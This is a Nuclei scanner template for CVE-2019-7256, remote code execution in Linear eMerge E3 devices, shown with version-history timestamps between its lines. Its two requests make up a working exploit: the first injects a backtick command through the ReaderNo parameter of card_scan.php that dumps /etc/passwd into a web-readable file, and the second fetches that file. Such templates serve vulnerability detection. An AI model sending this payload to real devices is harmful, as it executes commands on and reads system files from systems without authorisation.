2021-01-02 04:59:06 +00:00
|
|
|
id: CVE-2019-7256
|
2020-09-06 11:55:23 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: eMerge E3 1.00-06 - Remote Code Execution
|
|
|
|
author: pikpikcu
|
|
|
|
severity: critical
|
2022-05-09 16:12:52 +00:00
|
|
|
description: Linear eMerge E3-Series devices are susceptible to remote code execution vulnerabilities.
|
2021-08-19 13:15:35 +00:00
|
|
|
reference:
|
|
|
|
- https://www.exploit-db.com/exploits/47619
|
2022-02-21 18:33:16 +00:00
|
|
|
- http://linear-solutions.com/nsc_family/e3-series/
|
2022-05-09 16:12:52 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-7256
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://applied-risk.com/labs/advisories
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
2022-10-14 09:24:23 +00:00
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
2022-05-17 09:18:12 +00:00
|
|
|
cvss-score: 10
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2019-7256
|
|
|
|
cwe-id: CWE-78
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: cve,cve2019,emerge,rce,edb
|
2020-09-06 11:55:23 +00:00
|
|
|
|
|
|
|
requests:
|
2021-09-08 12:17:19 +00:00
|
|
|
- raw:
|
2020-09-06 12:06:45 +00:00
|
|
|
- |
|
2020-09-06 11:55:23 +00:00
|
|
|
GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
2021-09-08 12:17:19 +00:00
|
|
|
|
2020-09-06 12:06:45 +00:00
|
|
|
- |
|
2020-09-06 11:55:23 +00:00
|
|
|
GET /nuclei.txt HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
2020-09-06 20:52:50 +00:00
|
|
|
matchers-condition: and
|
2020-09-06 11:55:23 +00:00
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2021-09-08 12:17:19 +00:00
|
|
|
|
2020-09-18 14:58:38 +00:00
|
|
|
- type: regex
|
|
|
|
regex:
|
2021-07-24 21:35:55 +00:00
|
|
|
- "root:.*:0:0:"
|
2022-05-09 16:12:52 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/05/03
|